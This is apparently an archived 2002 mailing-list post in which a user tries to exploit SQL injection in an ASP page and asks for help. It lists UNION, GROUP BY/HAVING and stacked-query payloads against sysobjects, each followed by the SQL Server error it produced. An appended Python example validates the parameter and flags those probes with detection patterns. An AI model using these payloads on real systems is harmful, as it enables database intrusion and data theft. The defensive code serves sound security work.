Exploitable by SQL injection???

From: SQL injector (sql_injector@yahoo.com)
Date: Sun Apr 07 2002 - 19:14:07 EDT


        Greetings everyone. It appears that I have an ASP
page that is vulnerable to direct SQL injection. Alas
I am having some difficulty exploiting it. Below you
will find my result set. My process is to enumerate
the table and column names and then query the
sysobject. My problem is that it seems that the server
first tells me a valid table name and then appears to
recant on it! After that it seems as though I am
having a UNION problem. I am not sure whether this is
due to my syntax or due to the fact that the SQL
statement may reference another table that my UNION
does not. My analysis is that the SQL statement is
exploitable but the number of tables involved makes it
difficult if not impossible.

Are there other ways to enumerate the other table
names, if they exist? Is my syntax correct? Perhaps I
need to change the UNION statement? There appears to
be an ORDER BY which I've tried to comment out (--),
but then I get a UNION syntax error.

Where am I going wrong? In the final analysis: Is this
thing exploitable?

Also note the goal here is just to retrieve
information from the database, not bypass a logon.

-- Thanks sql_injector...

====================================================

Below you will find the process and the result after
each:

vulnerable.asp?g=1

[returns valid page]

vulnerable.asp?g=1 having 1=1?

Error Type:
Microsoft OLE DB Provider for ODBC Drivers
(0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'Table.Name' is invalid in the select list because it
is not contained in an aggregate function and there is
no GROUP BY clause.

vulnerable.asp?g=1 group by Table.Name having 1=1--

Error Type:
Microsoft OLE DB Provider for ODBC Drivers
(0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'Table.ID' is invalid in the select list because it is
not contained in either an aggregate function or the
GROUP BY clause.

vulnerable.asp?g=1 group by Table.Name, Table.ID
having 1=1--

Error Type:
Microsoft OLE DB Provider for ODBC Drivers
(0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The
column prefix 'Table' does not match with a table name
or alias name used in the query.

vulnerable.asp?g=1 UNION ALL SELECT 'A',1 FROM
sysobjects

Error Type:
Microsoft OLE DB Provider for ODBC Drivers
(0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER
BY items must appear in the select list if the
statement contains a UNION operator.

vulnerable.asp?g=1 UNION ALL SELECT
Table.Name,Table.ID FROM sysobjects

Error Type:
Microsoft OLE DB Provider for ODBC Drivers
(0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The
column prefix 'Table' does not match with a table name
or alias name used in the query.

****Here are some very interesting URLs that perhaps
get to the heart of the matter.

vulnerable.asp?g=1;

Error Type:
Microsoft OLE DB Provider for ODBC Drivers
(0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL
Server]Incorrect syntax near the keyword 'order'.

vulnerable.asp?g=4 UNION ALL SELECT 'A',9 FROM
SysObjects WHERE 1=1 ORDER BY 1,2

Error Type:
Microsoft OLE DB Provider for ODBC Drivers
(0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL
Server]Incorrect syntax near the keyword 'order'.

vulnerable.asp?g=4 UNION ALL SELECT 'A',9 FROM
SysObjects WHERE 1=1 ORDER BY 1,2?

Error Type:
Microsoft OLE DB Provider for ODBC Drivers
(0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL
Server]Incorrect syntax near the keyword 'UNION'.

****NOTE: Another interesting URL

vulnerable.asp?g=1; SELECT name FROM sysobjects

Error Type:
Microsoft OLE DB Provider for ODBC Drivers
(0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The
column prefix 'jTab' does not match with a table name
or alias name used in the query.


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
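
An added example, not part of the original post: a defender-side check that validates the numeric parameter and labels the kinds of probes shown in the message when they appear in request logs. It assumes `g` is meant to be a plain integer, as in `vulnerable.asp?g=1`; the log lines are constructed in a simplified "path query" form and the label names are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample: "path query" pairs modelled on the requests in the post.
SAMPLE_REQUESTS = [
    "/vulnerable.asp g=1",
    "/vulnerable.asp g=1+having+1=1--",
    "/vulnerable.asp g=1+group+by+Table.Name+having+1=1--",
    "/vulnerable.asp g=1+UNION+ALL+SELECT+'A',1+FROM+sysobjects",
    "/vulnerable.asp g=1;",
    "/vulnerable.asp g=1;%20SELECT%20name%20FROM%20sysobjects",
]

# (label, pattern) pairs, reported in this order. Labels are hypothetical names.
PROBE_PATTERNS = [
    ("catalog-access", re.compile(r"\bsys(objects|columns)\b", re.I)),
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("error-enumeration", re.compile(r"\b(group\s+by|having)\b", re.I)),
    ("stacked-statement", re.compile(r";")),
    ("sql-comment", re.compile(r"--|/\*")),
]

def parse_g(raw):
    """Strict allow-list for the numeric parameter: ASCII digits only, else None."""
    return int(raw) if re.fullmatch(r"[0-9]{1,9}", raw) else None

def classify(query_string):
    """Return (validated_int_or_None, probe_labels) for the g parameter."""
    params = dict(p.partition("=")[::2] for p in query_string.split("&"))
    raw = unquote_plus(params.get("g", ""))  # decode %20 and '+' before matching
    value = parse_g(raw)
    if value is not None:
        return value, []
    labels = [name for name, rx in PROBE_PATTERNS if rx.search(raw)]
    return None, labels or ["non-numeric"]

def scan(requests):
    """Yield (request, labels) for every request whose g is not a plain integer."""
    for line in requests:
        _path, _, query = line.partition(" ")
        value, labels = classify(query)
        if value is None:
            yield line, labels

if __name__ == "__main__":
    for line, labels in scan(SAMPLE_REQUESTS):
        print(",".join(labels), "<-", line)
```

Rejecting any `g` that fails `parse_g` and passing the validated integer to a parameterized query closes the injection. Returning a generic error page instead of the ODBC driver text removes the column names disclosed in the error messages above.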


